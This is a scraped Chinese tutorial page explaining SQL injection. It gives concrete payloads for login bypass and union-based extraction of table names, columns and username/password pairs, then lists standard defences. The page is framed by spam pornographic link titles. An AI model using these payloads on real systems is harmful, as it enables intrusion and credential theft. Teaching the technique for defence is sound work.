国产片侵犯亲女视频播放_亚洲精品二区_在线免费国产视频_欧美精品一区二区三区在线_少妇久久久_在线观看av不卡

服務(wù)器之家:專注于服務(wù)器技術(shù)及軟件下載分享
分類導(dǎo)航

Mysql|Sql Server|Oracle|Redis|MongoDB|PostgreSQL|Sqlite|DB2|mariadb|Access|數(shù)據(jù)庫技術(shù)|

服務(wù)器之家 - 數(shù)據(jù)庫 - 數(shù)據(jù)庫技術(shù) - SQL注入的實現(xiàn)以及防范示例詳解

SQL注入的實現(xiàn)以及防范示例詳解

2021-12-10 18:26還會見面嗎? 數(shù)據(jù)庫技術(shù)

SQL注入是比較常見的網(wǎng)絡(luò)攻擊方式之一,它不是利用操作系統(tǒng)的BUG來實現(xiàn)攻擊,而是針對程序員編寫時的疏忽,這篇文章主要給大家介紹了關(guān)于SQL注入的實現(xiàn)以及防范的相關(guān)資料,需要的朋友可以參考下

什么是sql注入

sql注入是指通過構(gòu)建特殊的輸入篡改原來的sql語句達到攻擊者所需的操作。

sql 注入產(chǎn)生原因

我們訪問動態(tài)網(wǎng)頁時往往會向服務(wù)器發(fā)送請求,服務(wù)器向數(shù)據(jù)訪問層發(fā)起 sql 查詢請求,若驗證通過就會執(zhí)行 sql 語句。如果用戶輸入的數(shù)據(jù)被構(gòu)造成惡意sql代碼,如果程序沒有細致地過濾用戶輸入的數(shù)據(jù)則會使非法數(shù)據(jù)侵入系統(tǒng)。

登錄案例講解

select * from admin where uname='用戶名' and pwd='密碼'

輸入 'or 1=1 #(–空格或–+或#:注釋掉后面的sql語句)

這時sql語句變?yōu)椋?code>select * from admin where uname='' or 1=1 # and pwd='密碼',這時sql語句永遠成立,繞過登錄。

基于get方式的sql注入

通過在url中修改對應(yīng)的id值,為正常數(shù)字、大數(shù)字、字符(單引號、雙引號、雙單引號、括號)、反斜杠來探測url中是否有注入點。

可登陸到mituan.zone進行測試

1、' '1'' limit 0,1 ' :多了一個單引號

可猜測sql語句為:select login_name,password from admin where id = 'id' limit 0,1

2、' ' limit 0,1 ':多了一個單引號

可猜測sql語句為:select login_name,password from admin where id = id limit 0,1

3、' '1'') limit 0,1 ':多了一個單引號

可猜測sql語句為:select login_name,password from admin where id = ('id') limit 0,1

4、單引號、括號都不報錯說明被接收的是字符串類型' "1"") limit 0,1 ':多了一個雙引號

可猜測sql語句為:select login_name,password from admin where id = ("id") limit 0,1

sql注入利用

1、利用order by判斷字段數(shù)

?
1
order by n(n為猜測字段數(shù))--+

以案例一為例

?
1
2
select login_name,password from admin where id = 'id' limit 0,1
用?id=1' order by 11--+

猜測錯誤時則會報錯

SQL注入的實現(xiàn)以及防范示例詳解

此時探測到有3個字段,用?id=0' union select 1,2,3--+探測到login_name在第二列,password在第三列,則第二、三列可利用。

SQL注入的實現(xiàn)以及防范示例詳解

?id=0' union select 1,2,3--+2,3改為user():查看當(dāng)前mysql登錄用戶名,database():查看當(dāng)前使用mysql數(shù)據(jù)庫名,version():查看當(dāng)前mysql版本,如改為?id=0'union select 1,user(),database()--+ 得到下圖中信息

SQL注入的實現(xiàn)以及防范示例詳解

2、利用union select 聯(lián)合查詢,獲取表名。(在使用union select時要將前面的sql語句報錯)

?
1
union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

SQL注入的實現(xiàn)以及防范示例詳解

3、利用union select 聯(lián)合查詢,獲取字段名。(以上面查詢到的users表為例)

?
1
union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

SQL注入的實現(xiàn)以及防范示例詳解

4、利用union select 聯(lián)合查詢,獲取字段值。(以上面查詢到的users表為例)

?
1
union select 1,group_concat(username,0x3a,password),3 from users--+ (0x3a為冒號,用來分隔不同字段的值)

SQL注入的實現(xiàn)以及防范示例詳解

如果是地址欄不能顯示信息的post形式則可以在對話框中輸入注入語句

SQL注入的實現(xiàn)以及防范示例詳解
SQL注入的實現(xiàn)以及防范示例詳解
SQL注入的實現(xiàn)以及防范示例詳解
SQL注入的實現(xiàn)以及防范示例詳解
SQL注入的實現(xiàn)以及防范示例詳解
SQL注入的實現(xiàn)以及防范示例詳解

這里使用的方法和在地址欄中的輸入一樣,都是先報錯前面的sql語句再使用union select聯(lián)合查詢拿出表中數(shù)據(jù)

sql 注入的防范方法

  • 對用戶的輸入進行過濾。如:對用戶的輸入進行校驗,可以通過正則表達式、限制長度、對單引號和雙"-"進行轉(zhuǎn)換等。
  • 編寫程序時不要使用動態(tài)拼裝sql,可以使用參數(shù)化的sql或者直接使用存儲過程進行數(shù)據(jù)查詢存取。
  • 不要直接使用管理員權(quán)限的數(shù)據(jù)庫連接,每個應(yīng)用使用單獨的且權(quán)限有限的數(shù)據(jù)庫。
  • 不要把機密信息直接存放,加密或者hash掉密碼和敏感的信息。
  • 程序的異常信息應(yīng)該給出盡可能少的提示,最好使用自定義的錯誤信息對原始錯誤信息進行包裝。

總結(jié)

到此這篇關(guān)于sql注入的實現(xiàn)以及防范的文章就介紹到這了,更多相關(guān)sql注入實現(xiàn)及防范內(nèi)容請搜索服務(wù)器之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持服務(wù)器之家!

原文鏈接:https://blog.csdn.net/qq_44515800/article/details/117409504

延伸 · 閱讀

精彩推薦
主站蜘蛛池模板: 日本理伦片午夜理伦片 | 麻豆一区二区三区 | 中文字幕日韩欧美一区二区三区 | 天天噜天天干 | 亚洲成人免费观看 | 99精品99| 国产精品国产成人国产三级 | 3344视频| 色综合天天综合网国产成人网 | 国产91久久久久蜜臀青青天草二 | 国产精品久久久 | 天堂av一区二区 | 日韩久久精品一区二区 | 亚州成人| 91国在线产 | 日本一区二区高清不卡 | 亚洲精品视频在线观看免费视频 | 欧美日韩三级在线 | 亚洲精品免费在线 | 欧美成人一区二区三区片免费 | 精品自拍视频在线观看 | 成人国产精品久久久 | 日韩精品免费一区二区三区 | 欧美视频免费在线 | 久久久精品一区二区 | 91看片淫黄大片一级在线观看 | 99精品免费 | 日韩在线观看一区 | 蜜桃色网| 精品一区av| 免费观看特级毛片 | 久久久久久国产一级毛片高清版 | 免费一二三区 | 成人精品视频99在线观看免费 | 日韩高清电影 | 男女视频在线 | 日本一区二区高清视频 | 天堂网av在线 | 欧美日韩亚洲视频 | av毛片| 国产va|